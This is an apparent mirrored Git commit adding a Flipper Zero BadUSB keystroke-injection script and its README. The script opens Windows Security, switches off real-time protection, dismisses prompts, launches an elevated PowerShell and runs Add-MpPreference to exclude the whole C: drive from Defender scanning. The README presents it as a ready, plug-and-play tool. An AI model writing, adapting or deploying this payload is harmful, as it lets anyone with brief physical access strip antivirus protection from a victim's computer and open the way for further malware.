mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-18 16:01:31 +00:00
Adding lost UNC0V3R3D BadUSB Collection
This commit is contained in:
+41
@@ -0,0 +1,41 @@
|
||||
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
||||
REM Description: Disables Windows Defender.
|
||||
REM Version: 1.0
|
||||
REM Category: Execution
|
||||
DELAY 1500
|
||||
CTRL ESC
|
||||
DELAY 750
|
||||
STRING windows security
|
||||
DELAY 250
|
||||
ENTER
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 500
|
||||
SPACE
|
||||
DELAY 1000
|
||||
ALT y
|
||||
DELAY 1000
|
||||
ALT F4
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1000
|
||||
ALT y
|
||||
DELAY 1000
|
||||
STRING Add-MpPreference -ExclusionPath “C:”
|
||||
ENTER
|
||||
DELAY 2000
|
||||
STRING EXIT
|
||||
ENTER
|
||||
+43
@@ -0,0 +1,43 @@
|
||||
|
||||
# Disable_WinDefender
|
||||
|
||||
This script disables the windows defender until the pc is restarted.
|
||||
|
||||
|
||||
|
||||
## How to use?
|
||||
|
||||
This script is plug and play.
|
||||
|
||||
|
||||
|
||||
|
||||
## Features
|
||||
|
||||
- open powershell
|
||||
- disable windows defender
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Feedback
|
||||
|
||||
If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Support
|
||||
|
||||
For support, contact me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
## Meta
|
||||
|
||||
|
||||
- If you want to sponsor me on Patreon, the link is on my profile.
|
||||
|
||||
|
||||
Reference in New Issue
Block a user